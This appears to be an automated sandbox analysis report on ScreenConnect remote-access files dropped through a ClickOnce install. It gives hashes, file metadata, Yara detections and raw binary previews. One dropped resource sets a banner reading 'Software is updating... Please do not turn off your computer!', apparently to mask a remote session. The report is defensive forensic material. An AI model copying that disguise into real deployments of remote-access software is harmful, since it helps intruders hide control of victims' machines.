                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................+.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):61216
                                                                                                                                                                                                                                                      Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                      MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                      SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                      SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                      SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P............"...0.................. ........@.. ....................... .......|....@.....................................O....... ............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):81696
                                                                                                                                                                                                                                                      Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                      MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                      SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                      SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                      SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.X..........."...0..@...........^... ...`....@.. .......................`............@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):548352
                                                                                                                                                                                                                                                      Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                      MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                      SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                      SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                      SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...iB............" ..0..V...........p... ........... ....................................@.................................qp..O.......t............................o..8............................................ ............... ..H............text....T... ...V.................. ..`.rsrc...t............X..............@..@.reloc...............\..............@..B.................p......H........B...,..................To........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1721856
                                                                                                                                                                                                                                                      Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                      MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                      SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                      SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                      SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..>...........\... ...`....... ...............................o....@.................................?\..O....`..|............................[..8............................................ ............... ..H............text....<... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................s\......H.......H..................0....[........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):600864
                                                                                                                                                                                                                                                      Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                      MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                      SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                      SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`...........@.................................5...O.... .................. )...@..........8............................................ ............... ..H............text...X.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................i.......H....... F................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):197120
                                                                                                                                                                                                                                                      Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                      MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                      SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                      SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                      SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5............" ..0.................. ... ....... .......................`......].....@.................................-...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.en-US.resources

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):359
                                                                                                                                                                                                                                                      Entropy (8bit):4.83753806903797
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l10+HwercYn:rHy2DLI4MWoHO8L9cAgRMZRCl1FHcY
                                                                                                                                                                                                                                                      MD5:17702A9E63BED7438F3217D594D6E35C
                                                                                                                                                                                                                                                      SHA1:7C556F344A57D5933A528F8B8CFD0363F15AE0E3
                                                                                                                                                                                                                                                      SHA-256:8BFD7D9E0BAC6BDE538DFBE31E8919933547F30248E747C5B38EB84472DF3701
                                                                                                                                                                                                                                                      SHA-512:642BB2D85ECB653DA779AFFAA4285612BC7EB08383967DB16D9F9CA709F6A46280E6E6C7605E850E5AEC28043828826CA6948982591C310374119785784B303B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.?....=Software is updating... Please do not turn off your computer!..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.resources

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):256
                                                                                                                                                                                                                                                      Entropy (8bit):4.878405169379307
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJkw:rHy2DLI4MWoj12eKfKCKB
                                                                                                                                                                                                                                                      MD5:B5450F2285052D7D31714E92BAE6143E
                                                                                                                                                                                                                                                      SHA1:0904C6FE250983A97D5210DFEACCB1C1CF34D643
                                                                                                                                                                                                                                                      SHA-256:23054E289EB585EB0314C44FD753ED3803C012E06B954926F3FC7167A370F928
                                                                                                                                                                                                                                                      SHA-512:79DA469F0C4ACB50D9B399086ED171C69E00C4CF5CB8A2089FD49F5864C1BF46E8434FB23CD210ABB83B88FF06E435A92C8E926B435BFB03EA207D5D7069723E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.en-US.resources

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):50133
                                                                                                                                                                                                                                                      Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                      MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                      SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                      SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                      SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.resources

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26722
                                                                                                                                                                                                                                                      Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                      MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                      SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                      SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                      SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                      Malicious:false
